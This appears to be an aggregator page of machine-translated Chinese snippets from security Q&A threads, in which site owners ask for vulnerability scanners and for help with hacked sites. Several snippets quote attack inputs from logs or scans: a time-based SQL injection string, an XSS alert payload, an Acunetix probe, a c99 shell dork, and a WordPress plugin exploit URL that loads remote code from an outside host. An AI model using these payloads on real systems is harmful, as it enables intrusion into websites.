1回答
恶意软件扫描网站代码?
、、、、
我有多个使用工具扫描的Linux CentOS服务器,当它在我的服务器上发现一些恶意代码(共享/专用)时,这些站点的排名就会下降。
我正在寻找的是一个服务器扫描仪,扫描.php,.js文件和类似的恶意软件代码,这样我就可以在谷歌降低该网站排名之前做出反应。
我已经找到了一个php恶意软件扫描仪(nbs-system/ PHP -恶意软件-查找器:检测潜在的恶意PHP文件),还在努力使它工作,但我想找到一个更完整的解决方案,以提高我的服务器的安全性。
有服务器/网站特定的恶意软件扫描器吗?
注意:不是寻找成熟的杀毒产品,而是寻找一种,最好是开源的,扫描网页代码的恶意软件扫描仪,而不是.exe,.
浏览 0提问于2016-05-17得票数 6
回答已采纳
如何运行PHP Security Scanner和SpikePHPSecAudit?
我已经将它们提取到我的网站的根目录中,并认为它可以像phpSecInfo一样运行,您只需导航到
www.mySite.com/phpsecinfo/index.php
任何帮助都将不胜感激。
ps我使用的是Windows XP和XAMPP
浏览 1提问于2010-05-27得票数 1
回答已采纳
7回答
我需要看看我正在测试的网站是否容易受到这和这等网站上的多个谷歌呆子的攻击。传统上,人们通过搜索Google中的"Index of /“+c99.php”来使用'dork‘,并获得一堆结果。
我如何能够搜索所有的书呆子为我的具体网站迅速和容易?有可能吗?
编辑:为了澄清,我可以访问,并使用一些商业付费应用程序做网页应用程序扫描。然而,我有问题的网站使用WAF和限制我的连接,这大大减慢了事情。因此,我更多的是寻找一个查询谷歌的程序,而不是扫描网站。
浏览 0提问于2013-10-07得票数 14
回答已采纳
我搜索并找到了一个,但它有好几年的历史了。
有哪些程序,或者我可以运行一个简单的脚本,来查找我整个站点中的URL中的SQL注入漏洞?
最好,我想运行一个脚本(PHP)或程序来爬行我的网站,从一个链接跳到另一个链接,尝试查找漏洞,并在发现时存储该URL,以便我有一个需要修复的URL列表。
这真的存在吗?
浏览 0提问于2012-03-13得票数 26
回答已采纳
是否有任何软件或硬件可以在没有付费订阅的情况下执行渗透测试?例如,免费使用,如Kali-linux等。我想学习如何执行渗透测试。如果有任何网站或指南,您的建议,我将不胜感激。
我想在无线路由器和服务器(如Windows、Mac和Linux设备)上进行渗透测试。
有没有可能从安卓,iOS,Linux,黑莓设备上下载?
谢谢。
浏览 0提问于2016-02-28得票数 1
题目在题目里。我似乎找不到一个直截了当的答案,泰伯似乎在他们的网站上回避一个“是/否”的答案。几年前,有人告诉我,Qualys是由PCI批准的PCI遵从性,而Nessus当时没有。这一切都变了吗?
浏览 0提问于2016-08-11得票数 0
回答已采纳
1回答
我在做一个被黑的wordpress网站。乍一看,我看到了一个site.xml文件和一个/good目录,放在网站的根目录上。
site.xml包含以下头字符串:
<urlset xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xmlns="http://www.sitemaps.org/schemas/sitemap/0.9"
xsi:schemaLocation="http://www.sitemaps.org/schemas/sitemap/0.9
浏览 0提问于2015-06-04得票数 0
回答已采纳
3回答
我的网站最近被黑客入侵,显然它是代码注入漏洞,而不是SQL注入。至少这是Google告诉我的,甚至给了我一个可能的iframe代码。这对我来说是个打击,因为我的网站从来没有发生过这种情况。我发现最近我正在我的webserver上测试upload php脚本,然后忘了删除它。所以我知道他们是怎么进来的。因此,我继续记录所有我看到的不属于服务器的东西,包括upload php脚本。另外,我在.htaccess文件中看到了一些有用的东西。我没有检查代码,而是从服务器上完全删除了它。
不管怎样,我试着尽我所能,就像人们在网上建议的那样。尽管如此,黑客并没有完全消失,也没有完全消失。所以,我认为够了就够
浏览 0提问于2012-07-30得票数 -1
回答已采纳
2回答
PHP安全漏洞的渗透测试
、、、
我正在做一篇关于“识别和测试网站安全漏洞”的本科生研究论文。最初,我认为我应该手动测试,因为我在我的方法中指定,我只测试几个选定的漏洞,即SQL注入,跨站脚本,错误报告,会话劫持和输入验证。但当我继续研究时,我发现所有的文章和教程都建议使用软件。
我有几个我的伙伴管理的网站,所以我想在他们的网站上进行测试。我正在检查半打网站上的一些漏洞。我应该使用渗透测试工具,还是只做动态渗透测试而不使用软件?
浏览 2提问于2015-05-25得票数 2
回答已采纳
7回答
我正在寻找一个新的工具,为ol‘管理工具包,并将有价值的一些建议。
我想做一些“自动”测试的几个网站XSS (跨站点脚本)秃鹫,以及检查SQL注入机会。我意识到自动化工具方法并不一定是唯一或最好的解决方案,但我希望它能给我一个好的开始。
我需要扫描的站点涵盖了从PHP / MySQL到Cold聚变的堆栈范围,并混合了一些经典的ASP和ASP.NET以获得良好的效果。
你会用什么工具扫描Web应用程序秃鹫?
(请注意,我直接关注的是网络应用,而不是服务器本身)。
浏览 0提问于2009-07-26得票数 5
回答已采纳
我正在寻找一些更先进的安全检查的例子,我可以在我的网站上执行。
我在PDO MySQL数据库中使用PHP5.2。
我最感兴趣的是:
使用默认PDO插入/更新的SQL注入示例(是的,我正在使用准备),
任何允许我查看脚本是否没有在代码中的任何地方显示表名的检查(包括PHP异常),
任何杀死或黑客用户帐户在数据库中的方式,无论是通过注册表格或认证表格(也就是说-我已经有蛮力保护登录表单)。
我还想对任何试图劫持会话或跨站点脚本的尝试执行实时检查(我有文本区域,允许用户(通过微小的MCE)输入HTML代码,我想知道我的机制是否防止任何众所周知的XSS攻击)。
任何示例都将不胜感激
浏览 6提问于2013-02-01得票数 0
回答已采纳
我开发了一个web应用程序,主要是在PHP和JavaScript中使用一些AJAX。
我并没有这种体验,但我喜欢尝试一些工具,比如sqlmap,看看我的代码中是否有任何缺陷。
或者,如果您知道一些代码,我可以尝试各种形式,这也可能是有帮助的!
浏览 0提问于2015-12-24得票数 -4
回答已采纳
我的主机多个wordpress站点都遇到了安全问题。所有的网站都有不同的主题,在不同的服务器上,在不同的用户内部隔离。他们已经竞选了几个月,没有任何问题。然而,上周,他们中的一些人受到以下因素的影响:
将流量重定向到显示文件系统中奇怪/损坏文件的垃圾邮件,包括添加到.php文件(编码头)中的额外文件和内容--我们的云提供商发出了滥用警报:一家大银行联系了他们,称我们的IP地址被用来进行钓鱼攻击。服务器在PHP进程(非常高的负载、CPU和内存使用)方面运行得很高。
对此,我有:
一个月前,FilesChecked 从备份中复制了SQL和Wordpress文件,用官方的Wordpress 替换了整
浏览 6提问于2020-04-20得票数 0
我已经下载了我的网站/数据库,并在Centos 7服务器本地重新创建它。我想给它一个很好的锤击,以便找到和修复任何漏洞。有人能推荐一款能帮我完成这个功能的软件吗?开源就太棒了!
浏览 0提问于2016-09-27得票数 -5
有没有人知道免费的自动测试工具来测试asp.net网站的安全性、连接池等,我用了netsparker社区版,但功能非常有限。
浏览 1提问于2011-12-07得票数 1
回答已采纳
我在读一本来自著名证书的白帽黑客书。他们说,黑客攻击web服务器的方法是:
信息收集(域名、DNS、IP等)
脚印(例如:抓横幅)
网站镜像
漏洞扫描
会话劫持
密码破解
除了会话劫持和信息收集之外,我不明白为什么我不会仅仅推出和/或Nessus来查找所有的弱点。
如果您可以自动执行手动测试,这有什么意义呢?
例如,如果漏洞扫描器不知道如何查找易受攻击的cookie,如果我手动找到一种方法来执行会话劫持,我将无法为此对Nessus的Acunetix进行培训。即使我这么做了,我也不知道这会有多大好处。
请解释我为什么不让我的工具为我做黑客。
浏览 0提问于2020-02-29得票数 31
6回答
我听说有一些免费的应用程序可以检查PHP网站的漏洞,但我不知道该用什么。我想要一个Windows的免费程序(最好有一个GUI),它将分析我的网站,并给我一个报告。
有人知道解决方案吗?
浏览 2提问于2008-12-04得票数 37
回答已采纳
3回答
我正在开发一个web应用程序。我曾经用过Joomla这样的东西来做一些很棒的东西,但现在我终于用上了PHP、MySQL和CodeIgniter。
当你制作一个严肃的web应用程序来处理大量数据时,我应该对我的数据输入采取什么预防措施来完全清理它?我知道有明显的修剪,转义,xss清理等-但是我应该结合哪些其他技术来阻止注入到数据库中?
不仅如此,有没有什么非破坏性的数据库注入代码可以用来测试我的所有输入?也就是说,它将注入一些可见的东西,但实际上不会对我的测试数据库造成任何损害?我不是一个完全的黑客,在这方面需要一点指导。
黑客还使用什么其他常见的方法来销毁或读取用户数据,我如何自己检查?我没有
浏览 0提问于2010-02-28得票数 25
回答已采纳
1回答
我想知道是否有一种方法可以检查网页及其所有资源(脚本、图像、样式)的完整性。我想,浏览器可以生成一个网站的哈希值和它的所有资源,以检查网站的某些方面是否发生了变化。 任何现代浏览器都能做到这一点吗?如果没有,是否有应用程序或扩展程序自动执行此操作? 或者,有没有其他更好的方法来检查网站的某些方面是否发生了变化?
浏览 29提问于2020-07-21得票数 2
我的客户的一个网站被一个声称他/她现在可以访问数据库的人破坏了。事实上,这个人发了一封电子邮件说:“联系我,我会告诉你洞在哪里”,我只能希望访问仅限于只读。
我检查了访问日志,并找到了一个脚本&未转义的GET请求变量,允许传递恶意探测。
攻击开始的时候通常是:
xxx.xxx.xx.xxx - - [24/Jun/2017:17:29:02 -0600] "GET /x.x?x=2 HTTP/1.1" 200 13785 "Mozilla/5.0 (Windows; U; Windows NT 5.1; pt-PT; rv:1.9.1.2) Gecko/2009
浏览 0提问于2017-06-30得票数 2
回答已采纳
2回答
你知道从雪豹网站上搜索(分析) SQL注入的软件吗?
我找到了一些可以在Linux或Windows上运行的。
我知道大多数Linux (控制台)应用程序可以在Mac下运行,但是有基于GUI的软件吗?
浏览 0提问于2012-08-17得票数 2
回答已采纳
2回答
我在安全测试方面很新。
如果有人能建议使用JSON请求的REST上运行安全问题扫描(E.GSQLInjection)的开源/免费工具,这将是非常有用的。
一些服务也使用OAUTH。
谢谢
浏览 0提问于2016-06-20得票数 3
1回答
这些要求是什么?
、、
我正在检查我的服务器的web服务器日志,我正在安装一个wordpress网站,并发现所有这些请求,该网站是新的!
我该担心吗?我的网站被黑了还是怎么了?我一点也不明白。将我的网站改为"ooooo.com“
2022/07/18 19:51:07 [error] 27501#27501: *3184 access forbidden by rule, client: 172.70.147.9, server: oooooo.com, request: "GET /wp-content/plugins/apikey/apikey.php?test=hello HTTP/2.0
浏览 0提问于2022-07-18得票数 0
回答已采纳
Virustotal在其领域是优秀的。有没有任何工具(或网站),我们可以上传(也可能是离线PC版本)来测试项目或网站(PHP,Java,其他)的漏洞,但全进一次扫描(如Virustotal),将包括所有免费/试用工具在互联网上可用?
更新:嗯,似乎没有。作为志愿者,我创建了一个示例站点,展示了我的意思:现场演示 (Github)。
浏览 0提问于2019-01-08得票数 0
回答已采纳
看看访问日志,我看到来自同一个IP地址的请求流,这些请求正在向文件发出请求,并将.php和.php5附加到URL。
这些日志看起来像是:
104.[..] - - [26/Feb/2016:21:37:53 -0500] "GET /wp-content/uploads/2014/09/gal1-630x21014ff1e.php HTTP/1.0" 404 7817 "-" "-"
104.[..] - - [26/Feb/2016:21:37:54 -0500] "GET /wp-content/uploads/2014/09/gal
浏览 0提问于2016-02-27得票数 0
3回答
我正在开发/托管一个AWS上的Asp.Net IIS网站。我添加了StackExchange.Exceptional,在最初的几天中,我得到了访问以下页面的异常:
/CFIDE/administrator/
和
/muieblackcat/
我发现第一个是扫描来尝试访问一些冷融合管理页面,第二个是扫描PHP vunerabilities.
我很冷静,因为我使用的是MS堆栈,但我知道还有用于IIS/ASP.Net服务器的扫描器。
在ASP.Net/IIS堆栈中,我可以做什么/使用哪些措施/工具来防御这种扫描器?
浏览 0提问于2017-04-18得票数 2
回答已采纳
这就是问题所在。我正在主持大约20个Wordpress网站在一个主机。当我从病毒中清除一个网站时(.ico文件将代码注入到index.php中),另一个已经清理过的网站被再次注入(在几个小时或几天内)。
对所有sql基进行备份和删除所有文件的解决方案-对我不起作用-因为在一些网站中,我的小自定义脚本(没什么,只是在html中做了很小的修改,非常肯定我没有错误地创建漏洞)。
所以我的问题是:
是否有可能在cPanel中分离主目录,这样每个网站都会彼此分离?
如果不是,将文件管理器中的权限更改为例如544将停止编辑文件?
关于如何永远删除这个黑客和所有后门,还有其他解决方案吗?
浏览 0提问于2018-08-26得票数 0
5回答
我正在开发一个网站,我正在使用yslow来分析速度和统计数据,网页开发人员的html和css验证等。
我可以使用什么来检查安全错误?
浏览 7提问于2010-02-11得票数 1
回答已采纳
1回答
你好,我正在使用沙箱开始实施安全措施。
我得到一个URL,它使用url (/Dowload.php?file=files/read_me.txt)调用文件名.我知道获得download.php的来源是可能的,但我正在努力做到这一点。我已经尝试过基础知识(./Dowload.php等),但是我无法获得源代码。我认为它阻止了PHP扩展的使用,但不知道如何绕过它。有什么想法吗?
浏览 0提问于2015-09-28得票数 0
我绝对不是安全专家。我拥有一个非常小的个人网站,我主要是为了练习而用php编写的。
我注意到日志里有个奇怪的url电话
process.php?d=MV0f+F6R+6Nn/B4VDh1FRJ9fSEjpPw==&b=1
我试着自己跟踪那个url,但它除了404之外什么也不去。
我不想从轨道上核爆我的网站。至少我可以采取哪些步骤来确定是否真的发生了任何事情。
这个网站是用symfony 4写的(不管它值多少钱)。
浏览 0提问于2019-09-26得票数 0
回答已采纳
6回答
测试黑客的企图
、、、
我想确保我的网站被保护免受黑客攻击,我认为最好的测试方式是尝试和黑我自己的网站。黑客会做什么样的事情来攻击我的网站呢?
例如,
Test -他们可以将javascript放在输入字段中,例如
<“open javascript tag">window.location = “www.somewhereelse.com”;<“end javascript tag”>
保护-在显示数据之前使用php实体函数。
为了确保我的网站是安全的,我还能用什么东西来测试呢?
浏览 3提问于2011-06-06得票数 5
回答已采纳
3回答
我在我的变量上使用了mysql_real_escape_string(),但在查看我的日志时,我注意到来自某人的输入流,其中的条目如下:
${@print(md5(acunetix_wvs_security_test))}
1\" or (sleep(4)+1) limit 1 --
诸若此类。一大堆人的名单。
他是不是在尝试什么都没发生?或者仅仅使用mysql_real_escape_string()我的代码不安全?
编辑:我看不到任何损坏,但网站上的大多数输入区都被多次尝试过。如果它一次都不起作用,意识到它是安全的,他不会停下来吗?
浏览 2提问于2013-01-27得票数 4
我知道微软提供了一个工具,告诉你关于coss网站,脚本攻击等。该工具是
但是,有没有你用过的.NET应用程序的类似工具,哪一个在ASP .Net应用程序中被广泛使用?
浏览 0提问于2010-05-15得票数 2
回答已采纳
2回答
最近,我检查了日志,发现了一些对服务器的奇怪请求。例如
GET /path/Microsoft.XMLHTTP HTTP/1.0
GET /path2/Scripting.FileSystemObject HTTP/1.0
进一步的检查似乎指向了某个机器人在做网站存档。一个网络档案机器人会以命令的形式执行这样的请求来存档我们的站点吗?
例如,如果来自互联网档案馆或某个库进行归档,这些归档机器人实际上会执行这样的请求吗?我想他们只是在搜索或者抓取整个网站,而不是调用这样的命令。
更新:
经过进一步的调查,我发现存档机器人可能深入分析了页面上的javascript,并抓住了包含Scripting.
浏览 0提问于2015-10-23得票数 2
回答已采纳
是否有任何工具可以检查站点和服务器的PCI合规性。
此外,这将是伟大的,如果我知道我可以让我的服务器和magento网站PCI合规性。
谢谢
浏览 0提问于2016-07-31得票数 1
1回答
常见网络攻击
、、、
可能重复:
如何在用户攻击中测试已经内置的网站?我已经在.NET中开发了一个过程管理系统,现在在将它放到生产环境之前,我想通过一系列的攻击来测试它。
如果有人能分享一些常见的在web应用程序上应用的攻击,我很感激。我知道一些常见的攻击,如未经授权的访问、URL嵌入攻击、sql注入等等。
请分享您的经验和建议,谢谢。
浏览 3提问于2012-12-21得票数 2
与手动查找漏洞相比,像w3af这样的工具在查找web应用程序漏洞方面有多有效?他们是否能够从OWASP前10名中找到所有漏洞,如反射xss、持久xss、sqli、lfi/rfi和不受限制的文件上传?还是会有一些漏洞从裂缝中掉下来,而仍未被发现?
浏览 0提问于2014-11-27得票数 3
3回答
我计划检查我的网站所有常见的安全漏洞,如跨站点脚本,sql注入等。谁能告诉我有什么自动化的工具,我可以运行我的.net网络应用程序,并发现所有的安全漏洞存在。我试过CAt.net,但它不能支持大型应用程序。我看到了大约owsap,但反对它也不是自动的。我正在找一些东西,可以告诉我文件名和方法名等。
浏览 0提问于2010-08-13得票数 13
作为我工作的一部分,我定期测试web应用程序的漏洞。当涉及到SQL注入时,我的方法是从手动浏览网站开始,然后将我怀疑与数据库交互的参数发送到SQLMap。
现在,我想知道这是否是寻找SQL注入的正确方式?SQLMap是否能够找到大多数类型的SQL注入,或者我是否应该求助于手动测试?
浏览 0提问于2016-05-16得票数 8
6回答
我在我的网站上运行了一个漏洞扫描器,它显示了几个漏洞,如下所示:
http://.../search?text=&ClassIDNames[37]=<script>alert('Found')</script>&ActiveFacet[ClassID]=37
但是,当将url复制到浏览器时,它不会给我警报输出,而是给出相应输入的搜索结果。这是我要修的东西还是没什么好担心的?或者我还需要做些什么来复制它呢?
浏览 0提问于2015-06-17得票数 3
回答已采纳
我被分配了一个任务,使用OpenVAS3对服务器进行渗透测试。
但是,我在公司防火墙的后面,OpenVAS3使用rsync在端口873上执行来自rsync://rsync.openvas.org:/nvt-feed的更新。我被阻止使用该端口,将不得不手动安装这些插件。
我已经从http://wald.intevation.org/frs/download.php/588/openvas-plugins-1.0.7.tar.gz下载了插件,它需要openvas2-server来安装。我确信它们也适用于openvas3,但是我不知道插件目录的文件夹结构能够手动安装它们。
是否有人能够手动下载和安装
浏览 0提问于2010-01-20得票数 1
回答已采纳
1回答
云中有一个作为虚拟机安装的web服务器。我自己配置了它,它有两个公司网站。我不打算再去那里了。因此,在公开之前,我想检查一下它是否存在安全漏洞。请指导我的最佳实践,清单和审计程序,任何衡量和评估服务器的安全性。
浏览 0提问于2013-07-03得票数 0
回答已采纳
我的web服务器在1分钟内收到了100多次来自Acunetix scanner的访问尝试!
考虑到每分钟有许多不同的终端用户访问网站,我如何避免这些攻击?
浏览 1提问于2016-10-18得票数 0
1回答
我注意到wordpress防火墙拒绝了550多个恶意请求,但只有HTTP200OK接受了这个请求。这是URL
http://domainname.com//wp-admin/admin-post.php?swp_debug=load_选项&swp_url=http://bearxcat.com//wp-includes/css/help.txt&wpaa=echo "h1loo1";
我很担心,因为我立即谷歌了bearxcat.com,它是用另一种语言,谷歌说这个网站可能被黑。
我立即做了一次恶意扫描,但什么也没发现。我注意到在这个请求之后,他们发送了/webc
浏览 0提问于2019-04-23得票数 0
1回答
网站漏洞扫描工具
、、
关于这件事,我见过几个问题,但没有一个完全符合我想要的。我有一个ASP.NET站点在我的机器上,我最近完成了,但我有点担心安全。我很肯定我做得很好,但总有一次我错过了什么。
因此,我正在寻找一个满足以下需求的工具
vulnerabilitiesCan 扫描本地托管的网站(如在同一台机器上作为工具),以便安装 be (即,没有基于#1的基于web的)。测试ASP.NET (Web,但MVC也不错)以解决SQL或XSS问题。(我认为XSS很难测试,但是SQL注入应该更容易找到)
谢谢!让我知道我是否不够具体,或者这是否更适合于网站管理员SE。
浏览 3提问于2011-05-18得票数 3
回答已采纳
2回答
块机器人搜索漏洞
、、
我下载了一个Wordpress插件,每当我的网站出现404错误时,它都会给我发电子邮件。昨晚我收到了大约1000封来自机器人的电子邮件
/wp-content/plugins/(流行插件的X名称)/timthumb.php
几周前,timthumb.php是一个流行的插件,它有一个零日漏洞,所以流量正在搜索我的站点中可能被黑客攻击的漏洞。我没有安装计时器,但是我真的不想要这种流量--有一个简单的方法阻止它吗?
浏览 7提问于2011-09-10得票数 2
回答已采纳
扫码
添加站长 进交流群
领取专属 10元无门槛券
手把手带您无忧上云
相关资讯
热门标签
云服务器
ICP备案
对象存储
腾讯会议
实时音视频活动推荐
腾讯云开发者
